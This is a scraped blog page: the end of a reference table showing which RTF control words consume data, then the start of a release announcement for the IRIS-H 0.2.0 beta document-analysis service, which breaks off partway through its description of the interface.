<th scope="row">stylelockqfset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelocktheme</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylesheet</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">subfontbysize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">subject</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">super</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sv</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">svb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">swpbdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tabsnoovrlp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">taprtl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkbestfit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkborder</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkcolor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkfont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkhdrcols</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkhdrrows</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllklastcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllklastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllknocolband</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllknorowband</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkshading</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">tcelld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tcn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">template</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">themedata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">time</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">title</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">titlepg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tldot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tleq</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">tlhyph</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlmdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">toplinepunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqdec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">transmf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trhdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trkeep</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trkeepfollow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trowd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">truncatefontheight</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">truncex</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrdgl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrdgr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandhorzeven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandhorzodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandverteven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandvertodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscfirstcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscfirstrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsclastcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsclastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscnecell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscnwcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscsecell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscswcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsnowrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsrowd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">twoonone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwalways</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwfirst</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwfirstlast</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwlast</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwno</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ud</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">uld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ulnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ulw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">upr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">useltbaln</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">usenormstyforlist</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">userprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">usexform</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">utinl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalb</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">vertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">viewnobound</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">webhidden</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wgrffmtfilter</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">widctlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">widowctrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">windowcaption</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">wpeqn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wpjst</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wpsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraparound</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wrapdefault</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wrapthrough</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraptight</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraptrsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">writereservation</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">writereservhash</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">wrppunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xform</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattrname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattrvalue</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlclose</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlnstbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlopen</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlsdttcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttregular</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttunknown</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">yxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
</tbody>
</table>
</div>
</div>
<br>
</div>
</div>Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com1tag:blogger.com,1999:blog-250109472373647719.post-42041472167397664982018-08-12T16:53:00.000+01:002018-08-12T16:53:42.542+01:00IRIS-H: Alpha is dead! Long live Beta.<b style="background-color: white; color: #3d85c6; font-size: x-large;"><span style="font-family: "trebuchet ms" , sans-serif;">Quick Summary</span></b><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #3d85c6; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-size: 13px;">: 0.2.0 (beta)</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-size: 13px;">: new version release</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-size: 13px;">: API, UI</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-size: 13px;">: New version includes:</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) complete re-write of the UI 'look & feel'</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) Yara rules support</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) personal service accounts</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) 'Workbench' data view (see Detailed Summary section for description)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) 'External Intelligence' section added to the 'Report' data view</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) public GitHub repository for issues tracking and feedback</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">API backend data handling infrastructure changes</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">static analysis data extraction routines improvements</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">bug fixes</span></li>
</ul>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-size: 13px;">: Attach external intelligence feeds, minor cosmetic UI fixes, further data parsers improvements.</span></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Known Issues</b>: Minor cosmetic glitches in the UI.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="background-color: white; color: #666666; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-size: x-large;">Detailed Summary</b></span><br />
<b style="background-color: white; color: #3d85c6; font-size: x-large;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></b>
<span style="font-family: "trebuchet ms" , sans-serif;"><u style="font-weight: bold;"><span style="color: #3d85c6;">Disclaimer:</span></u> All the functionality descriptions and screenshot examples given below are relevant to the application state at the release time. Some features and interface 'look & feel' might change in the follow up releases.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">Sections below describe some of the major features/changes implemented in this release.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>New UI</b></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">IRIS-H UI has been completely re-written using <a href="https://github.com/akveo/nebular" rel="nofollow" target="_blank">Akveo</a> Nebular UI and the mighty power of Angular. Where data views and service pages content is mostly the same, their look changed completely. Please see below for detailed breakdown.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Dashboard (Home page)</b></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQ5fNSvGeq2QQL6wRFCPvwJf77WJKMh4cxHE13cL97i7poP_vjAejjgLZtu09FwK5erdcFrApCpHKQJXZoRvSfUihd7kdi76zcHeKlg-ipZ1Otkof2ioQCpaw3bweBPb9FoVOfO_81i68/s1600/Screenshot+from+2018-08-06+16-31-58.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" data-original-height="826" data-original-width="1600" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQ5fNSvGeq2QQL6wRFCPvwJf77WJKMh4cxHE13cL97i7poP_vjAejjgLZtu09FwK5erdcFrApCpHKQJXZoRvSfUihd7kdi76zcHeKlg-ipZ1Otkof2ioQCpaw3bweBPb9FoVOfO_81i68/s320/Screenshot+from+2018-08-06+16-31-58.png" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;">IRIS-H Dashboard View</span></td></tr>
</tbody></table>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The dashboard now performs 3 functions:</span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">overall submitted data view</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">system health display</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;"> filters for currently loaded data</span></li>
</ul>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Where overall submitted data and systems health views are self-explanatory, the data filters functionality is explained below.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Each statistical data view panel is interactive. Clicking on a pie chart section or a bar will filter the 'Submissions' table view. For example, clicking 'Malicious OLE' bar in 'Object Linking & Embedding' panel will change the 'Submissions' table view to display only reports for malicious OLE files.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgiAox-5VXkJ-6hdqA0sg_WndeMTJZxYwYn8h9kxchmO7iCJN543iGPYqvhjJV84niQHTqSxKoHZZon0dj4whc0XccPCKqcx7SxuNMWi5fgtFUITnCgRl6OG-KsOsteErRn1-RGxIz11jD/s1600/Screenshot+from+2018-08-06+16-56-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" data-original-height="278" data-original-width="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgiAox-5VXkJ-6hdqA0sg_WndeMTJZxYwYn8h9kxchmO7iCJN543iGPYqvhjJV84niQHTqSxKoHZZon0dj4whc0XccPCKqcx7SxuNMWi5fgtFUITnCgRl6OG-KsOsteErRn1-RGxIz11jD/s1600/Screenshot+from+2018-08-06+16-56-11.png" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;">Filtering 'Submissions' table view using Dashboard submitted data panel</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: The filters will apply only to the data already loaded into the dashboard - 50 latest submissions.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The data displayed in the dashboard depends on the user type - Public / Registered. There is a concept of 'Public' and 'Private' data now. The file analysis data is tied to the user account the file was submitted under.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Public data</b> - file analysis reports generated under 'Public User' account (not logged in)</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Private data</b> - file analysis reports generated under logged in user.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<b><span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">Submission Page</span></b></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Submission page didn't change that much in terms of the content and functionality.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvof6EHk89VlTnmIvDfqxaTNolRcTkwnMemD-lAlVqV3UhJn4yW3o2RspreZ95BFScpGLHXsB_G6hn_-SCoDLkhiIOp-rcpGMtNPgX7J2ZmVQwTFFDgnWSrr2C5ZeDGaZMVZ4Z_nD9seBC/s1600/Screenshot+from+2018-08-06+18-19-50.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="808" data-original-width="1600" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvof6EHk89VlTnmIvDfqxaTNolRcTkwnMemD-lAlVqV3UhJn4yW3o2RspreZ95BFScpGLHXsB_G6hn_-SCoDLkhiIOp-rcpGMtNPgX7J2ZmVQwTFFDgnWSrr2C5ZeDGaZMVZ4Z_nD9seBC/s320/Screenshot+from+2018-08-06+18-19-50.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Submission Page</td></tr>
</tbody></table>
<div>
